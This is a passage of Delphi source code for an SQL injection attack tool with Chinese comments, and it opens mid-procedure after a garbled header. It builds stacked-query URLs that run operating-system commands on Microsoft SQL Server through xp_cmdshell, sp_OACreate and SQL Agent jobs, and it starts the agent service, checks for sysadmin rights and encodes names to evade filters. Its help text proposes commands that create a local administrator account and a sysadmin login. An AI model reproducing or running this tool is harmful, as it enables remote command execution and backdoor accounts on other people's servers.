xxx.txt

SQL注入主要代码文档,超过这个时间则不再访问

bsp;      end;
        if Get(Url+';DROP%20TABLE%20[Command_Tmp]--') then
        begin
          Memo2.Lines.Add('命令执行完成');
        end;
      end else
      begin
        CommandStr:=Url+';EXEC%20MASTER..XP_CMDSHELL%20'''+CommandStr+'''--';
        if get(CommandStr) then
          Memo2.Lines.Add('命令执行完成。');
      end;
    end;
   //OAcreate
   //使用sp_OACreate来运行系统命令
    if rbOA.Checked then
    begin
      //指明当前用户是否为 sysadmin 固定服务器角色的成员
      if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER(''sysadmin'')%20as%20varchar(1))=1') then
      begin
        CommandStr :=Url+';use%20'+DbName+';declare%20@o%20int;exec%20'+
                         'sp_oacreate%20''wscript.shell'',@o%20out;exec%20'+
                         'sp_oamethod%20@o,''run'',NULL,''cmd%20/c%20'+
                         CommandStr+'''--';
        if Get(CommandStr) then
          Memo2.Lines.Add('命令执行完成。');
      end else
      begin
        Memo2.Lines.Add('只有 sysadmin 固定服务器角色的成员才能执行 sp_OACreate。');
        exit;
      end;
    end;
    //Job
    //使用SQLSERVERAGENT的JOB来运行系统命令
    if rbJob.Checked then
    begin
      //启动SQLSERVERAGENT
      if Get(Url+';exec%20master..xp_servicecontrol%20''start'',''SQLSERVERAGENT'';--') then
      begin
        Memo2.Lines.Add('SQLSERVERAGENT 启动成功！');
        CommandStr :=Url+';use%20'+DbName+';exec%20sp_delete_job%20null,''x'''+
                         ';exec%20sp_add_job%20''x'''+
                         ';exec%20sp_add_jobstep%20Null,''x'',Null,''1'',''CMDEXEC'',''cmd%20/c%20'+
                         CommandStr+''';exec%20sp_add_jobserver%20Null,''x'',@@servername'+
                         ';exec%20sp_start_job%20''x''--';
        if get(CommandStr) then
          Memo2.Lines.Add('命令执行完成。');
      end else
      begin
        Memo2.Lines.Add('SQLSERVERAGENT 启动失败，操作终止！');
        exit;
      end;
    end;
  finally
    Screen.Cursor :=crDefault;
    BtnExecute.Visible :=true;
    BtnCancel.Visible :=false;
  end;
end;

function TForm1.Get(URL: string): boolean;
var
  IDHTTP: TIDHttp;
  ss: String;
begin
  Result:= False;
  IDHTTP:= TIDHTTP.Create(nil);
  try
    try
      idhttp.HandleRedirects:= true;                //必须支持重定向否则可能出错
      idhttp.ReadTimeout:= 30000;                   //超过这个时间则不再访问
      ss:= IDHTTP.Get(URL);
      if IDHTTP.ResponseCode=200 then
        Result :=true;
    except
      //on E: Exception do
      //  Application.MessageBox(pchar('出现异常，操作终止！'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
    end;
  finally
    IDHTTP.Free;
  end;
end;

function TForm1.GetWBMsg(URL: string): string;
  function GetResultStr(str:string):string;
  var
    istart,iend:integer;
    ss:string;
  begin
    istart:=pos('|',str);
    if istart>0 then
    begin
      ss:=copy(str,istart+1,length(str)-istart);
      iend :=pos('|',ss);
      if iend>0 then
      begin
        ss:=copy(ss,1,iend-1);
      end;
    end;
    if ss='' then
      Result :='未知'
    else Result :=ss;
  end;
var
  ss:string;
begin
  tag:=0;
  wb.Navigate(URL);
  while (tag=0) do
    Application.ProcessMessages;
  ss :=(wb.Document as IHTMLDocument2).Body.innerText;
  Result :=GetResultStr(ss);
end;

function TForm1.StrToNChar(DbName, TName: string): string;
var
  i:integer;
  ss,str:string;
begin
  ss:=DbName+'..'+TName;
  for i:=1 to length(ss) do
  begin
    if i=1 then
      str :='NCHAR('+inttostr(ord(ss[i]))+')'
    else
      str :=str+'%2BNCHAR('+inttostr(ord(ss[i]))+')';
  end;
  Result :='OBJECT_ID('+str+')';
end;

procedure TForm1.wbDocumentComplete(Sender: TObject;
  const pDisp: IDispatch; var URL: OleVariant);
begin
  //Memo2.Text :=(wb.Document as IHTMLDocument2).Body.innerText;
  tag:=1;
end;

procedure TForm1.BtnStopClick(Sender: TObject);
begin
  isFinish :=True;
  BtnCheck.Visible :=true;
  BtnStop.Visible :=False;
end;

procedure TForm1.SetRdbCheck(rd: TRadioButton);
begin
  Memo2.Clear; 
  if rd=rbCmd then
  begin
    cbDisp.Enabled :=True;
    Memo2.Lines.Add('使用xp_cmdshell来运行系统命令');
    Memo2.Lines.Add('');
    Memo2.Lines.Add('net user test test /add');
    Memo2.Lines.Add('net localgroup administrators test /add');
    Memo2.Lines.Add('exec master..sp_addlogin test,test');
    Memo2.Lines.Add('exec master..sp_addsrvrolemember test,sysadmin');
  end;
  if rd=rbOA then
  begin
    cbDisp.Enabled :=False;
    Memo2.Lines.Add('使用sp_OACreate来运行系统命令');
  end;
  if rd=rbJob then
  begin
    cbDisp.Enabled :=False;
    Memo2.Lines.Add('使用SQLSERVERAGENT的JOB来运行系统命令');
    Memo2.Lines.Add('请先使用下列语句启动SQLSERVERAGENT:');
    Memo2.Lines.Add('');
    Memo2.Lines.Add('http://x.com/x.asp?a=1;exec master..xp_servicecontrol ''start'',''SQLSERVERAGENT'';--');
  end;
end;

procedure TForm1.rbCmdClick(Sender: TObject);
begin
  SetRdbCheck(rbcmd);
end;

procedure TForm1.rbOAClick(Sender: TObject);
begin
  SetRdbCheck(rbOA);
end;

procedure TForm1.rbJobClick(Sender: TObject);
begin
  SetRdbCheck(rbJob);
end;

procedure TForm1.FormShow(Sender: TObject);
begin
  SetRdbCheck(rbcmd);
end;

procedure TForm1.BtnCancelClick(Sender: TObject);
begin
  isCancel :=True;
  BtnExecute.Visible :=true;
  BtnCancel.Visible :=false;
end;

end.